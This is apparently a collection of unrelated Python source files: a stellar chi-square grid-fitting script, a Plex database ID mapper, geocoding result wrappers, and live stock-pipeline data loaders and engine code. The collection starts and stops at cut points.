/= numpoints try: alphachi /= numpoints except: pass betachi /= numpoints gammachi /= numpoints deltachi /= numpoints epsilonchi /= numpoints H8chi /= numpoints H9chi /= numpoints H10chi /= numpoints ''' #combine different lines print 'Shape: ', allchi.shape combined = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi#alphachi + betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi try: a10chi = alphachi + betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi except: pass b10chi = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi g10chi = gammachi + deltachi + epsilonchi + H8chi + H9chi + H10chi g9chi = gammachi + deltachi + epsilonchi + H8chi + H9chi g8chi = gammachi + deltachi + epsilonchi + H8chi b9chi = betachi + gammachi + deltachi + epsilonchi + H8chi + H9chi b8chi = betachi + gammachi + deltachi + epsilonchi + H8chi #specify a portion of the grid to extract #lowg, highg = 7.75, 8.25 #lowgindex, highgindex = np.where(logg == lowg), np.where(logg == highg) #loggsmall = logg[lowgindex[0]:highgindex[0]+1] #lowt, hight = 12250., 12750. #lowtindex, hightindex = np.where(teff == lowt), np.where(teff == hight) #teffsmall = teff[lowtindex[0]:hightindex[0]+1] #plot wireframe and scatter plot of chi-square values fig = plt.figure(1) ax = fig.gca(projection='3d') sur = ax.plot_wireframe(teffgrid,logggrid,combined,rstride=1,cstride=1) #ax.scatter(np.ravel(teffgrid),np.ravel(logggrid),np.ravel(combined),marker='o',s=30,c='r') #plt.show() #exit() #Determine minimum values of each grid allindex = np.unravel_index(allchi.argmin(),allchi.shape) alllogg, allteff = logg[allindex[0]], teff[allindex[1]] #print 'All: ' , alllogg, allteff try: alphaindex = np.unravel_index(alphachi.argmin(),alphachi.shape) alphalogg, alphateff = logg[alphaindex[0]], teff[alphaindex[1]] #print 'Alpha: ' , alphalogg, alphateff except: pass betaindex = np.unravel_index(betachi.argmin(),betachi.shape) betalogg, betateff = logg[betaindex[0]], teff[betaindex[1]] #print 'Beta: ' , betalogg, betateff gammaindex = np.unravel_index(gammachi.argmin(),gammachi.shape) gammalogg, gammateff = logg[gammaindex[0]], teff[gammaindex[1]] #print 'Gamma: ' , gammalogg, gammateff deltaindex = np.unravel_index(deltachi.argmin(),deltachi.shape) deltalogg, deltateff = logg[deltaindex[0]], teff[deltaindex[1]] #print 'Delta: ' , deltalogg, deltateff epsilonindex = np.unravel_index(epsilonchi.argmin(),epsilonchi.shape) epsilonlogg, epsilonteff = logg[epsilonindex[0]], teff[epsilonindex[1]] #print 'Epsilon: ' , epsilonlogg, epsilonteff H8index = np.unravel_index(H8chi.argmin(),H8chi.shape) H8logg, H8teff = logg[H8index[0]], teff[H8index[1]] #print 'H8: ' , H8logg, H8teff H9index = np.unravel_index(H9chi.argmin(),H9chi.shape) H9logg, H9teff = logg[H9index[0]], teff[H9index[1]] #print 'H9: ' , H9logg, H9teff H10index = np.unravel_index(H10chi.argmin(),H10chi.shape) H10logg, H10teff = logg[H10index[0]], teff[H10index[1]] #print 'H10: ' , H10logg, H10teff combinedindex = np.unravel_index(combined.argmin(),combined.shape) combinedlogg, combinedteff = logg[combinedindex[0]], teff[combinedindex[1]] #print 'Combined: ' , combinedlogg, combinedteff #exit() #Print the chi-square value of a particular grid at a particular point #loggwant = np.abs(logg-8.25).argmin() #teffwant = np.abs(teff-13000).argmin() #print allchi[loggwant,teffwant] #Print values along a particular row #teffwant = np.where(teff == 13900) #loggwant = np.where(logg == 7.95) #print H10chi[loggwant,:] #print H10chi[:,teffwant] #plt.clf() #plt.plot(teff,np.array(H10chi[loggwant,:][0][0])) #plt.show() #====================================== #Remove part of the chi-square grid in a secondary solution is being found. if cutteff: ######## #Upper limit on Teff ######## #teff_limit = 14500. print combined.shape teffcut = np.abs(teff-teff_limit).argmin() print teffcut teff = teff[0:teffcut] #print len(teff_new) combined = combined[:,0:teffcut] betachi = betachi[:,0:teffcut] H9chi = H9chi[:,0:teffcut] H8chi = H8chi[:,0:teffcut] H10chi = H10chi[:,0:teffcut] b10chi = b10chi[:,0:teffcut] g10chi = g10chi[:,0:teffcut] g9chi = g9chi[:,0:teffcut] deltachi = deltachi[:,0:teffcut] epsilonchi = epsilonchi[:,0:teffcut] b9chi = b9chi[:,0:teffcut] b8chi = b8chi[:,0:teffcut] g8chi = g8chi[:,0:teffcut] try: alphachi = alphachi[:,0:teffcut] a10chi = a10chi[:,0:teffcut] except: pass ''' ####### #Lower limit on Teff teff_limit = 14700. print combined.shape teffcut = np.abs(teff-teff_limit).argmin() print teffcut teff = teff[teffcut:] #print len(teff_new) combined = combined[:,teffcut:] H10chi = H10chi[:,teffcut:] ''' #Find solution for whatever combinations you want try: print '\nAlpha:' ateff,atefferr,alogg,aloggerr = at.find_solution(alphachi,logg,teff) print '\nAlpha-10:' a10teff,a10tefferr,a10logg,a10loggerr = at.find_solution(a10chi,logg,teff) except: pass #exit() print '\nBeta:' bteff,btefferr,blogg,bloggerr = at.find_solution(betachi,logg,teff) print '\nGamma:' gteff,gtefferr,glogg,gloggerr = at.find_solution(gammachi,logg,teff) print '\nDelta:' dteff,dtefferr,dlogg,dloggerr = at.find_solution(deltachi,logg,teff) print '\nEpsilon:' eteff,etefferr,elogg,eloggerr = at.find_solution(epsilonchi,logg,teff) print '\nH8:' H8teff,H8tefferr,H8logg,H8loggerr = at.find_solution(H8chi,logg,teff) print '\nH9:' H9teff,H9tefferr,H9logg,H9loggerr = at.find_solution(H9chi,logg,teff) print '\nH10:' H10teff,H10tefferr,H10logg,H10loggerr = at.find_solution(H10chi,logg,teff) print '\nBeta - H10:' b10teff,b10tefferr,b10logg,b10loggerr = at.find_solution(b10chi,logg,teff) print '\nGamma - H10:' g10teff,g10tefferr,g10logg,g10loggerr = at.find_solution(g10chi,logg,teff) print '\nGamma - H9:' g9teff,g9tefferr,g9logg,g9loggerr = at.find_solution(g9chi,logg,teff) print '\nBeta - H9:' b9teff,b9tefferr,b9logg,b9loggerr = at.find_solution(b9chi,logg,teff) print '\nBeta - H8:' b8teff,b8tefferr,b8logg,b8loggerr = at.find_solution(b8chi,logg,teff) print '\nGamma - H8:' g8teff,g8tefferr,g8logg,g8loggerr = at.find_solution(g8chi,logg,teff) #print '\nCombined:' #combinedteff,combinedtefferr,combinedlogg,combinedloggerr = at.find_solution(combined,logg,teff) #exit() #interpolation = RectBivariateSpline(loggsmall,teffsmall,combinedsmall,kx=3,ky=3,s=0) interpolation = RectBivariateSpline(logg,teff,combined,kx=3,ky=3,s=0) #lowchi = interpolation(loggval.min(),bestteff) levels = [1,2,3,10,100,200,300,400,500,600,700] # range(0,1000,300) #plot contour plot plt.figure() #CS = plt.contour(teff,loggsmall,combinedsmall-lowchi)#,levels=levels) CS = plt.contourf(teff,logg,b9chi,100,cmap='jet')#,levels=levels) plt.colorbar(CS) plt.xlim(15000,10000) plt.ylim(9.5,7.0) #plt.plot(bestteff,loggval.min(),'^') #plt.xlim(bestteff+250.,bestteff-250.) #plt.ylim(loggval.min()+0.25,loggval.min()-0.25) #plt.clabel(CS,inline=1,fontsize=10) plt.show() #Check out the following with a smaller grid ###cs = plt.pcolor(teffsmall,loggsmall,combinedsmall-tpp(bestteff)) ###cb = plt.colorbar(cs) exit() #Below this is some code to fit an elliptic paraboloid to the surface, as well as doing a cubic spline interpolation. These are just other options. ''' #Fit a different order polynomial guess = np.zeros(10) xes = allchi[5,:8] yes = allchi[:8,5] pol = np.polyfit(xes,yes,3) pol2 = np.polyfit(yes,xes,3) guess[0] = allchi.min() guess[1] = pol[2] guess[2] = pol[1] guess[3] = pol[0] guess[4] = 1. guess[5] = 1. guess[6] = 5. guess[7] = pol2[0] guess[8] = pol2[1] guess[9] = pol2[2] fa = {'x':np.ravel(teffgrid),'y':np.ravel(logggrid),'z':np.ravel(allchi),'err':np.ravel(error)} params = mpfit.mpfit(fitpolynomial3,guess,functkw=fa,quiet=True) zz = polynomial3(teffgrid,logggrid,params.params) #Fine minimum of fit from coarse grid fitindex = np.unravel_index(zz.argmin(),zz.shape) fitlogg, fitteff = logg[fitindex[0]],teff[fitindex[1]] print 'Fit: ', fitlogg, fitteff zztest = polynomial3(tefftestgrid,loggtestgrid,params.params) fitindextest = np.unravel_index(zztest.argmin(),zztest.shape) fitloggtest, fittefftest = loggtest[fitindextest[0]],tefftest[fitindextest[1]] print 'Fit: ', fitloggtest, fittefftest #Plot all Chi square points and the fit fig3 = plt.figure(3) ax3 = fig3.gca(projection='3d') surf3 = ax3.plot_surface(teffgrid,logggrid,zz,rstride=1,cstride=1,shade=False,cmap='jet') plt.draw() ax3.scatter(np.ravel(teffgrid),np.ravel(logggrid),np.ravel(allchi),marker='o',s=30) surf3.set_edgecolors(surf3.to_rgba(surf3._A)) surf3.set_facecolors('white') #plt.show() #Calculate residuals and show those too residuals = zz - allchi fig4 = plt.figure(4) ax4 = fig4.gca(projection='3d') surf4 = ax4.plot_surface(teffgrid,logggrid,residuals,rstride=1,cstride=1,shade=False,cmap='jet') #plt.draw() #use this if you don't want it filled in surf4.set_edgecolors(surf4.to_rgba(surf4._A)) surf4.set_facecolors('white') plt.show() ''' #Try fitting a polynomial to the smaller subset error = np.ones([len(loggsmall),len(teffsmall)]) #print loggsmall #print teffsmall xes = combinedsmall[len(loggsmall)//2,:] #print xes yes = combinedsmall[:,len(teffsmall)/2] #print yes pol = np.polyfit(teffsmall,xes,2) pol2 = np.polyfit(loggsmall,yes,2) #2-order in both directions #guess = np.zeros(6) #guess[0] = combinedsmall.min() #guess[1] = pol[1] #guess[2] = pol[0] #guess[3] = 1. #guess[4] = pol2[1] #guess[5] = pol2[0] ''' #3-order in both directions guess = np.zeros(10) guess[0] = combinedsmall.min() guess[1] = pol[2] guess[2] = pol[1] guess[3] = pol[0] guess[4] = 1. guess[5] = 1. guess[6] = 5. guess[7] = pol2[0] guess[8] = pol2[1] guess[9] = pol2[2] ''' #Elliptic paraboloid guess = np.zeros(6) guess[0] = 0.4 guess[1] = teff[combinedindex[1]] guess[2] = (teffsmall[1] - teffsmall[0]) / (combinedsmall[0,1] - combinedsmall[0,0] ) #15. guess[3] = logg[combinedindex[0]] guess[4] = (loggsmall[1] - loggsmall[0]) / (combinedsmall[1,0] - combinedsmall[0,0] )#0.005 guess[5] = combinedsmall.min() #print guess fa = {'x':np.ravel(teffsmallgrid),'y':np.ravel(loggsmallgrid),'z':np.ravel(combinedsmall),'err':np.ravel(error)} #params = mpfit.mpfit(fitpolynomial2,guess,functkw=fa,quiet=True) params = mpfit.mpfit(fitparaboloid,guess,functkw=fa,quiet=True,maxiter=1000) print params.status, params.niter, params.fnorm, params.dof #zz = polynomial2(teffsmallgrid,loggsmallgrid,params.params) zz = paraboloid(teffsmallgrid,loggsmallgrid,params.params) guessfit = paraboloid(teffsmallgrid,loggsmallgrid,guess) #Fine minimum of fit from coarse grid fitindex = np.unravel_index(zz.argmin(),zz.shape) fitlogg, fitteff = loggsmall[fitindex[0]],teffsmall[fitindex[1]] #print 'Fit: ', fitlogg, fitteff zztest = paraboloid(teffsmallfinegrid,loggsmallfinegrid,params.params) #zztest = polynomial2(teffsmallfinegrid,loggsmallfinegrid,params.params) fitindextest = np.unravel_index(zztest.argmin(),zztest.shape) fitloggtest, fittefftest = loggsmallfine[fitindextest[0]],teffsmallfine[fitindextest[1]] print 'logg fit: ', fitloggtest print 'Teff fit: ', fittefftest #Plot all Chi square points and the fit fig3 = plt.figure(3) ax3 = fig3.gca(projection='3d') surf3 = ax3.plot_surface(teffsmallgrid,loggsmallgrid,zz,rstride=1,cstride=1,shade=False,cmap='jet') #surf3 = ax3.plot_surface(teffsmallgrid,loggsmallgrid,guessfit,rstride=1,cstride=1,shade=False,cmap='jet') #surf3 = ax3.plot_surface(teffsmallfinegrid,loggsmallfinegrid,zztest,rstride=1,cstride=1,shade=False,cmap='jet') plt.draw() ax3.scatter(np.ravel(teffsmallgrid),np.ravel(loggsmallgrid),np.ravel(combinedsmall),marker='o',s=30) ax3.scatter(fittefftest,fitloggtest,zztest.min(),marker='o',c='r',s=60) surf3.set_edgecolors(surf3.to_rgba(surf3._A)) surf3.set_facecolors('white') #plt.show() #Calculate residuals and show those too residuals = zz - combinedsmall fig4 = plt.figure(4) ax4 = fig4.gca(projection='3d') surf4 = ax4.plot_surface(teffsmallgrid,loggsmallgrid,residuals,rstride=1,cstride=1,shade=False,cmap='jet') #plt.draw() #use this if you don't want it filled in surf4.set_edgecolors(surf4.to_rgba(surf4._A)) surf4.set_facecolors('white') #plt.show() #Find delta chi square == 1 surface deltazztest = zztest - zztest.min() oldglist = [] oldtlist = [] n,m = 0,0 for j in teffsmallfine: m = 0 for i in loggsmallfine: if deltazztest[m,n] <= 1.: oldglist.append(i) oldtlist.append(j) m += 1 n += 1 #print np.amin(oldglist),np.amax(oldglist) #print np.amin(oldtlist),np.amax(oldtlist) print 'logg error: ',(np.amax(oldglist)-np.amin(oldglist))/2. print 'Teff error: ',(np.amax(oldtlist)-np.amin(oldtlist))/2. plt.show() #=================== #cubic spline interpolation of grid interpolation = RectBivariateSpline(logg,teff,combined,kx=3,ky=3,s=0) glist = [] tlist = [] newgrid = np.empty([len(loggsmallfine),len(teffsmallfine)]) print 'Reading off new values' n,m = 0,0 for j in teffsmallfine: m = 0 for i in loggsmallfine: newgrid[m,n] = interpolation(i,j) if interpolation(i,j) <= 1000: #number is the max delta chi square we want #print i,j,out(i,j) glist.append(i) tlist.append(j) m += 1 n += 1 print 'Done reading off new values' interpindex = np.unravel_index(newgrid.argmin(),newgrid.shape) interplogg, interpteff = loggsmallfine[interpindex[0]], teffsmallfine[interpindex[1]] print 'Interpolation: ' , interplogg, interpteff ```
{ "source": "josh-gaby/plex-movie-agent-mapper", "score": 3 }
#### File: plex-movie-agent-mapper/plexmovieagentmapper/dbcopy.py ```python import os import shutil import tempfile class DbCopy(object): def __init__(self, original_path): self._original_path = original_path def __enter__(self): temp_dir = tempfile.gettempdir() base_path = os.path.basename(self._original_path) self.path = os.path.join(temp_dir,base_path) shutil.copy2(self._original_path, self.path) return self.path def __exit__(self,exc_type, exc_val, exc_tb): os.remove(self.path) ``` #### File: plex-movie-agent-mapper/plexmovieagentmapper/mapper.py ```python import os import re import logging from pathlib import Path import sqlite3 from plexmovieagentmapper import dbcopy from plexmovieagentmapper import media class PlexMovieAgentMapper: def __init__(self, plex_db=None, copy_db=True, debug=False): """ :param plex_db: :param copy_db: """ if not plex_db: raise ValueError("Database path is a required field") elif not os.path.isfile(plex_db): raise FileNotFoundError() self._debug = debug if self._debug: logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO) self._plex_db = plex_db self._copy_db = copy_db self._current_hash = {} self._imdb_hash, self._tmdb_hash, self._tvdb_hash, self._plex_hash, self._details_hash = self._generate_matching_hash() def get_imdb_from_plex_guid(self, plex_guid=None): """Returns an IMDB id for a given Plex GUID if a match is found. :param plex_guid: :return: """ if self._plex_hash.get(plex_guid, None): return self._plex_hash[plex_guid]['imdb'] return None def get_tmdb_from_plex_guid(self, plex_guid=None): """Returns a TMDB id for a given Plex GUID if a match is found. :param plex_guid: :return: """ if self._plex_hash.get(plex_guid, None): return self._plex_hash[plex_guid]['tmdb'] return None def get_tvdb_from_plex_guid(self, plex_guid=None): """Returns a TVDB id for a given Plex GUID if a match is found. :param plex_guid: :return: """ if self._plex_hash.get(plex_guid, None): return self._plex_hash[plex_guid]['tvdb'] return None def get_plex_guid_from_imdb(self, imdb_id=None): """Returns a Plex GUID for a given IMDB id if a match is found. :param imdb_id: :return: """ if self._imdb_hash.get(imdb_id, None): return self._imdb_hash[imdb_id] return None def get_plex_guid_from_tmdb(self, tmdb_id=None): """Returns a Plex GUID for a given TMDB id if a match is found. :param tmdb_id: :return: """ if self._tmdb_hash.get(tmdb_id, None): return self._tmdb_hash[tmdb_id] return None def get_plex_guid_from_tvdb(self, tvdb_id=None): """Returns a Plex GUID for a given TVDB id if a match is found. :param tvdb_id: :rtype: bool :return: """ if self._tvdb_hash.get(tvdb_id, None): return self._tvdb_hash[tvdb_id] return None def plex_guid_available(self, plex_guid=None): """Check if a Plex GUID is in the hash :param plex_guid: :return: """ return True if plex_guid and self._plex_hash.get(plex_guid, None) else False def get_details_from_imdb(self, library_id=None, imdb_id=None): """Get media item details for a given IMDB id. :param library_id: :param imdb_id: :return: """ if imdb_id and self._imdb_hash.get(imdb_id, None): details = self._details_hash.get(self._imdb_hash[imdb_id]) return details if not library_id or library_id in details.available_libraries else None return None def get_details_from_tmdb(self, library_id=None, tmdb_id=None): """Get media item details for a given TMDB id. :param library_id: :param tmdb_id: :return: """ if tmdb_id and self._tmdb_hash.get(tmdb_id, None): details = self._details_hash.get(self._tmdb_hash[tmdb_id]) return details if not library_id or library_id in details.available_libraries else None return None def get_details_from_tvdb(self, library_id=None, tvdb_id=None): """Get media item details for a given TVDB id. :param library_id: :param tvdb_id: :return: """ if tvdb_id and self._tvdb_hash.get(tvdb_id, None): details = self._details_hash.get(self._tvdb_hash[tvdb_id]) return details if not library_id or library_id in details.available_libraries else None return None def get_details_from_plex_guid(self, library_id=None, plex_guid=None): """Get media item details for a given Plex GUID. :param library_id: :param plex_guid: :return: """ if plex_guid: details = self._details_hash.get(plex_guid, None) if details and library_id: details.filter_files(library_id) return details return None def _generate_matching_hash(self): """Generate a series of lookup hashes :return: """ imdb_hash = {} tmdb_hash = {} tvdb_hash = {} plex_agent_hash = {} details_hash = {} if self._plex_db and os.path.isfile(self._plex_db): # Does the user want to copy the database? if self._copy_db: db_path = dbcopy.DbCopy(self._plex_db) else: db_path = Path(self._plex_db) with db_path as _db_path: if os.path.isfile(_db_path): # Open a connection to the database conn = sqlite3.connect(_db_path, timeout=10) # Read each result as a row conn.row_factory = sqlite3.Row c = conn.cursor() # Build a hash for Movies movie_query = 'SELECT mdi.id as metadata_item_id, t.tag, mdi.guid, mdi.title, mdi.year, mi.library_section_id, GROUP_CONCAT(mp.file, \';\') as file_parts, ls.uuid ' \ 'FROM metadata_items mdi ' \ 'JOIN taggings tg ON tg.metadata_item_id = mdi.id ' \ 'JOIN tags t ON t.id = tg.tag_id AND t.tag_type = 314 ' \ 'JOIN media_items mi ON mi.metadata_item_id = mdi.id ' \ 'JOIN media_parts mp ON mp.media_item_id = mi.id ' \ 'JOIN library_sections ls ON ls.id = mdi.library_section_id ' \ 'WHERE mdi.metadata_type = 1 ' \ 'GROUP BY mdi.guid, t.tag, mi.library_section_id' for row in c.execute(movie_query): row_id = None row_type = None if not row['guid'].startswith('com.plexapp.agents'): if row['tag'] and 'imdb' in row['tag']: row_id = row['tag'].split('imdb://')[1] row_type = 'imdb' imdb_hash[row_id] = row['guid'] elif row['tag'] and 'tmdb' in row['tag']: row_id = row['tag'].split('tmdb://')[1] row_type = 'tmdb' tmdb_hash[row_id] = row['guid'] elif row['tag'] and 'tvdb' in row['tag']: row_id = row['tag'].split('tvdb://')[1] row_type = 'tvdb' tvdb_hash[row_id] = row['guid'] else: if row['guid'] and 'imdb://' in row['guid']: if self._debug: logging.info(u"Matching ({}) for IMDB".format(row['guid'])) row_id = re.split(r'^((?:tt)?\d+)', row['guid'].split('imdb://')[1])[1] row_type = 'imdb' imdb_hash[row_id] = row['guid'] elif row['guid'] and 'themoviedb://' in row['guid']: if self._debug: logging.info(u"Matching ({}) for TMDB".format(row['guid'])) row_id = re.split(r'^(\d+)', row['guid'].split('themoviedb://')[1])[1] row_type = 'tmdb' tmdb_hash[row_id] = row['guid'] elif row['guid'] and 'thetvdb://' in row['guid']: if self._debug: logging.info(u"Matching ({}) for TVDB".format(row['guid'])) row_id = re.split(r'^(\d+)', row['guid'].split('thetvdb://')[1])[1] row_type = 'tvdb' tvdb_hash[row_id] = row['guid'] else: if self._debug: logging.info(u"Agent not matched for Movie ({})".format(row['guid'])) if not plex_agent_hash.get(row['guid'], None) and row_id is not None and row_type is not None: if self._debug: logging.info(u"Finding media files for {} ({})".format(row['title'], row['year'])) plex_agent_hash[row['guid']] = {'imdb': None, 'tmdb': None, 'tvdb': None} media_item = media.Media(row['guid'], row['title'], row['year'], 'video', row['metadata_item_id'], row['uuid']) details_hash[row['guid']] = media_item if plex_agent_hash.get(row['guid'], None): details_hash[row['guid']].add_files(row['library_section_id'], row['file_parts'].split(';')) plex_agent_hash[row['guid']][row_type] = row_id # Add TV Series to the hash tv_query = 'SELECT mdi.id as metadata_item_id, t.tag, mdi.guid, mdi.title, mdi.year, mdi.library_section_id, ls.uuid ' \ 'FROM metadata_items mdi ' \ 'JOIN library_sections ls ON ls.id = mdi.library_section_id ' \ 'LEFT JOIN taggings tg ON tg.metadata_item_id = mdi.id ' \ 'LEFT JOIN tags t ON t.id = tg.tag_id AND t.tag_type = 314 ' \ 'WHERE mdi.metadata_type = 2 ' \ 'GROUP BY mdi.guid, t.tag, mdi.library_section_id' c.execute(tv_query) tv_series_results = c.fetchall() for row in tv_series_results: row_id = None row_type = None if not row['guid'].startswith('com.plexapp.agents'): if row['tag'] and 'imdb' in row['tag']: row_id = row['tag'].split('imdb://')[1] row_type = 'imdb' imdb_hash[row_id] = row['guid'] elif row['tag'] and 'tmdb' in row['tag']: row_id = row['tag'].split('tmdb://')[1] row_type = 'tmdb' tmdb_hash[row_id] = row['guid'] elif row['tag'] and 'tvdb' in row['tag']: row_id = row['tag'].split('tvdb://')[1] row_type = 'tvdb' tvdb_hash[row_id] = row['guid'] else: if row['guid'] and 'imdb://' in row['guid']: if self._debug: logging.info(u"Matching ({}) for IMDB".format(row['guid'])) row_id = re.split(r'^((?:tt)?\d+)', row['guid'].split('imdb://')[1])[1] row_type = 'imdb' imdb_hash[row_id] = row['guid'] elif row['guid'] and 'themoviedb://' in row['guid']: if self._debug: logging.info(u"Matching ({}) for TMDB".format(row['guid'])) row_id = re.split(r'^(\d+)', row['guid'].split('themoviedb://')[1])[1] row_type = 'tmdb' tmdb_hash[row_id] = row['guid'] elif row['guid'] and 'thetvdb://' in row['guid']: if self._debug: logging.info(u"Matching ({}) for TVDB".format(row['guid'])) row_id = re.split(r'^(\d+)', row['guid'].split('thetvdb://')[1])[1] row_type = 'tvdb' tvdb_hash[row_id] = row['guid'] else: if self._debug: logging.info(u"Agent not matched TV series ({})".format(row['guid'])) if not plex_agent_hash.get(row['guid'], None) and row_id is not None and row_type is not None: if self._debug: logging.info(u"Finding media files for {} ({})".format(row['title'], row['year'])) plex_agent_hash[row['guid']] = {'imdb': None, 'tmdb': None, 'tvdb': None} media_item = media.Media(row['guid'], row['title'], row['year'], 'video', row['metadata_item_id'], row['uuid']) details_hash[row['guid']] = media_item ep_cur = conn.cursor() # We need to build an episode list episode_query = 'SELECT GROUP_CONCAT(mp.file, \';\') as file_parts ' \ 'FROM metadata_items mdi_s ' \ 'JOIN metadata_items mdi_e ON mdi_e.parent_id = mdi_s.id ' \ 'JOIN media_items mi ON mi.metadata_item_id = mdi_e.id ' \ 'JOIN media_parts mp ON mp.media_item_id = mi.id ' \ 'WHERE mdi_s.parent_id = ' + str(row['metadata_item_id']) episodes = ep_cur.execute(episode_query) ep_list = episodes.fetchone()['file_parts'].split(';') details_hash[row['guid']].add_files(row['library_section_id'], ep_list) if plex_agent_hash.get(row['guid'], None): plex_agent_hash[row['guid']][row_type] = row_id conn.close() return imdb_hash, tmdb_hash, tvdb_hash, plex_agent_hash, details_hash ``` #### File: plex-movie-agent-mapper/plexmovieagentmapper/part.py ```python class Part(object): def __init__(self, file=None, library_id=None): self.file = file self.library_id = library_id ```
{ "source": "joshgeller/pygeocodio", "score": 3 }
#### File: pygeocodio/geocodio/data.py ```python class Address(dict): """ Dictionary class that provides some convenience wrappers for accessing commonly used data elements on an Address. """ def __init__(self, address_dict, order="lat"): super(Address, self).__init__(address_dict) self.order = order @property def coords(self): """ Returns a tuple representing the location of the address in a GIS coords format, i.e. (longitude, latitude). """ x, y = ("lat", "lng") if self.order == "lat" else ("lng", "lat") try: return (self["location"][x], self["location"][y]) except KeyError: return None @property def accuracy(self): """ Returns the accuracy integer or None of the geocoded address. """ try: return self["accuracy"] except KeyError: return None @property def formatted_address(self): """ Returns a list of formatted addresses from the Location list """ return self.get("formatted_address", "") class Location(dict): """ Dictionary class that provides some convenience accessors to commonly used data elements. """ def __init__(self, result_dict, order="lat"): super(Location, self).__init__(result_dict) try: self.best_match = Address(self["results"][0], order=order) # A KeyError would be raised if an address could not be parsed or # geocoded, i.e. from a batch address geocoding process. An index error # would be raised under similar circumstances, e.g. the 'results' key # just refers to an empty list. except (KeyError, IndexError): self.best_match = Address({}) self.order = order @property def coords(self): """ Returns a tuple representing the location of the first result in a GIS coords format, i.e. (longitude, latitude). """ return self.best_match.coords @property def accuracy(self): """ Returns the accuracy integer or None of the geocoded address. """ return self.best_match.accuracy @property def formatted_address(self): """ Returns a list of formatted addresses from the Location list """ return self.best_match.formatted_address class LocationCollection(list): """ A list of Location objects, with dictionary lookup by address. """ lookups = {} def __init__(self, results_list, order="lat"): """ Loads the individual responses into an internal list and uses the query values as lookup keys. """ results = [] for index, result in enumerate(results_list): results.append(Location(result["response"], order=order)) self.lookups[result["query"]] = index super(LocationCollection, self).__init__(results) self.order = order def get(self, key): """ Returns an individual Location by query lookup, e.g. address or point. """ if isinstance(key, tuple): # TODO handle different ordering try: x, y = float(key[0]), float(key[1]) except IndexError: raise ValueError("Two values are required for a coordinate pair") except ValueError: raise ValueError("Only float or float-coercable values can be passed") key = "{0},{1}".format(x, y) return self[self.lookups[key]] @property def coords(self): """ Returns a list of tuples for the best matched coordinates. """ return [l.coords for l in self] @property def formatted_addresses(self): """ Returns a list of formatted addresses from the Location list """ return [l.formatted_address for l in self] ```
{ "source": "JoshGenao/pipeline-live", "score": 2 }
#### File: data/iex/fundamentals_loader.py ```python import logging import numpy as np from pipeline_live.data.sources import iex from zipline.pipeline.loaders.base import PipelineLoader from zipline.utils.numpy_utils import object_dtype log = logging.getLogger(__name__) class IEXEventLoader(PipelineLoader): def _safe_flat_getter(self, symbol, symbols, column): data = symbols.get(symbol, None) out = column.missing_value if data: out = data[0].get(column.name, column.missing_value) return out def load_adjusted_array(self, columns, dates, symbols, mask): symbol_dict = self._load() out = {} for c in columns: data = np.array([ self._safe_flat_getter(symbol, symbol_dict, c) for symbol in symbols ], dtype=c.dtype) if c.dtype == object_dtype: data[data == None] = c.missing_value # noqa out[c] = np.tile(data, (len(dates), 1)) return out class IEXBaseLoader(PipelineLoader): def load_adjusted_array(self, columns, dates, symbols, mask): symbol_dict = self._load() out = {} for c in columns: data = np.array([ symbol_dict.get(symbol, {}).get(c.name, c.missing_value) for symbol in symbols ], dtype=c.dtype) if c.dtype == object_dtype: data[data == None] = c.missing_value # noqa out[c] = np.tile(data, (len(dates), 1)) return out class IEXKeyStatsLoader(IEXBaseLoader): def _load(self): log.info('Loading Key Stats') return iex.key_stats() class IEXCompanyLoader(IEXBaseLoader): def _load(self): log.info('Loading Company Stats') return iex.company() class IEXFinancialsLoader(IEXEventLoader): def _load(self): log.info('Loading Financials') return iex.financials() class IEXEarningsLoader(IEXEventLoader): def _load(self): log.info('Loading Earnings') return iex.earnings() ``` #### File: data/polygon/fundamentals_loader.py ```python import numpy as np from zipline.pipeline.loaders.base import PipelineLoader from pipeline_live.data.sources import polygon class PolygonCompanyLoader(PipelineLoader): def load_adjusted_array(self, columns, dates, symbols, mask): company = polygon.company() out = {} for c in columns: data = [ company.get(symbol, {}).get(c.name, c.missing_value) for symbol in symbols ] out[c] = np.tile(np.array(data, dtype=c.dtype), (len(dates), 1)) return out ``` #### File: pipeline-live/pipeline_live/engine.py ```python from uuid import uuid4 from numpy import array import pandas as pd from pandas import DataFrame from six import ( iteritems, ) from toolz import groupby, juxt from toolz.curried.operator import getitem from zipline.lib.adjusted_array import ensure_adjusted_array, ensure_ndarray from zipline.errors import NoFurtherDataError from zipline.pipeline.engine import default_populate_initial_workspace from zipline.pipeline.term import AssetExists, InputDates, LoadableTerm from zipline.utils.calendars import get_calendar from zipline.utils.numpy_utils import ( as_column, repeat_first_axis, ) from zipline.utils.pandas_utils import explode class LivePipelineEngine(object): def __init__(self, list_symbols, calendar=None, populate_initial_workspace=None): self._list_symbols = list_symbols if calendar is None: calendar = get_calendar('NYSE').all_sessions self._calendar = calendar self._root_mask_term = AssetExists() self._root_mask_dates_term = InputDates() self._populate_initial_workspace = ( populate_initial_workspace or default_populate_initial_workspace ) def run_pipeline(self, pipeline): now = pd.Timestamp.now(tz=self._calendar.tz) today = pd.Timestamp( year=now.year, month=now.month, day=now.day, tz='utc') end_date = self._calendar[self._calendar.get_loc( today, method='ffill' )] start_date = end_date screen_name = uuid4().hex graph = pipeline.to_execution_plan(screen_name, self._root_mask_term, self._calendar, start_date, end_date, ) extra_rows = graph.extra_rows[self._root_mask_term] root_mask = self._compute_root_mask(start_date, end_date, extra_rows) dates, assets, root_mask_values = explode(root_mask) initial_workspace = self._populate_initial_workspace( { self._root_mask_term: root_mask_values, self._root_mask_dates_term: as_column(dates.values) }, self._root_mask_term, graph, dates, assets, ) results = self.compute_chunk( graph, dates, assets, initial_workspace, ) return self._to_narrow( graph.outputs, results, results.pop(screen_name), dates[extra_rows:], assets, ) def _compute_root_mask(self, start_date, end_date, extra_rows): """ Compute a lifetimes matrix from our AssetFinder, then drop columns that didn't exist at all during the query dates. Parameters ---------- start_date : pd.Timestamp Base start date for the matrix. end_date : pd.Timestamp End date for the matrix. extra_rows : int Number of extra rows to compute before `start_date`. Extra rows are needed by terms like moving averages that require a trailing window of data. Returns ------- lifetimes : pd.DataFrame Frame of dtype `bool` containing dates from `extra_rows` days before `start_date`, continuing through to `end_date`. The returned frame contains as columns all assets in our AssetFinder that existed for at least one day between `start_date` and `end_date`. 